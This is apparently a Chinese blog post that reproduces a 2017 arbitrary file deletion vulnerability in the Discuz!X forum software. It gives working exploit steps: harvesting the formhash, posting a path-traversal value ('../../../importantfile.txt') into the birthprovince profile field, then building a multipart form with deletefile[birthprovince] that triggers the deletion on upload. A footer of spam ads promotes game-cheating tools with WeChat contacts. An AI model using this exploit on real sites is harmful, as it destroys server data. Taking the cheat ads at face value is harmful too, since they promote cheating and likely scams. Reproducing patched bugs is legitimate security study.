Discuz!X前台任意文件删除漏洞重现
admin
2023-01-30 12:46:42
0

漏洞背景:
Discuz!X社区软件,是一个采用 PHP 和 MySQL 等其他多种数据库构建的性能优异、功能全面、安全稳定的社区论坛平台。

2017年9月29日,Discuz!修复了一个安全问题用于加强安全性,这个漏洞会导致前台用户可以导致任意删除文件漏洞。

2017年9月29日,知道创宇404 实验室开始应急,经过知道创宇404实验室分析确认,该漏洞于2014年6月被提交到 Wooyun漏洞平台,Seebug漏洞平台收录了该漏洞,漏洞编号 ssvid-93588。该漏洞通过配置属性值,导致任意文件删除。

经过分析确认,原有的利用方式已经被修复,添加了对属性的 formtype 判断,但修复方式不完全导致可以绕过,通过模拟文件上传可以进入其他 unlink 条件,实现任意文件删除漏洞。

漏洞复现:
1.进入设置-个人资料,先在页面源代码找到formhash值,可以看到值为2599b5e5
Discuz!X前台任意文件删除漏洞重现
2.开启一个插件Hackbar
Post数据:birthprovince=../../../importantfile.txt&profilesubmit=1&formhash=2599b5e5
Discuz!X前台任意文件删除漏洞重现
执行后会显示一片空白,你再刷新下或重新访问下就好了。
Discuz!X前台任意文件删除漏洞重现
Discuz!X前台任意文件删除漏洞重现
3.出生地被修改成要删除的文件。
最后构造表单执行删除文件
action="http://192.168.199.217/home.php?mod=spacecp&ac=profile&op=base&deletefile[birthprovince]=aaaaaa" method="POST" enctype="multipart/form-data">





Discuz!X前台任意文件删除漏洞重现
生成.html,上面的需要自己修改。
4.然后随便上传一张图片,就能删除自己要删除的。
Discuz!X前台任意文件删除漏洞重现
5.再访问回去看一下。
Discuz!X前台任意文件删除漏洞重现
复现成功。

相关内容

热门资讯

玩家最新攻略“财神十三张究竟有... 玩家最新攻略“财神十三张究竟有挂吗?”(其实是有挂)您好,财神十三张这个游戏其实有挂的,确实是有挂的...
今日重磅消息“新超凡炸/金/花... 今日重磅消息“新超凡炸/金/花怎么开挂?”(太坑了果然有挂)您好,新超凡炸/金/花这个游戏其实有挂的...
终于懂了“新战皇牛牛怎么开挂?... 网上科普关于“新战皇牛牛有没有挂”话题很是火热,小编也是针对新战皇牛牛作*弊开挂的方法以及开挂对应的...
今日重磅消息“新西游到底有挂吗... 您好:新西游这款游戏可以开挂,确实是有挂的,需要了解加客服微信【4282891】很多玩家在这款游戏中...
终于了解“邳州麻将真的有挂吗?... 网上科普关于“邳州麻将有没有挂”话题很是火热,小编也是针对邳州麻将作*弊开挂的方法以及开挂对应的知识...
最新引进“杭麻圈开挂器?”(必... 家人们!今天小编来为大家解答杭麻圈透视挂怎么安装这个问题咨询软件客服徽9784099的挂在哪里买很多...
玩家分享攻略“相约十五胡是不是... 家人们!今天小编来为大家解答相约十五胡透视挂怎么安装这个问题咨询软件客服徽9784099的挂在哪里买...
玩家最新攻略“全民游戏到底是不... 有 亲,根据资深记者爆料全民游戏是可以开挂的,确实有挂(咨询软件无需打开...
玩家最新攻略“情怀莆仙怎么开挂... 有 亲,根据资深记者爆料情怀莆仙是可以开挂的,确实有挂(咨询软件无需打开...
重磅消息“算番宝典怎么装挂?”... 网上科普关于“算番宝典有没有挂”话题很是火热,小编也是针对算番宝典作*弊开挂的方法以及开挂对应的知识...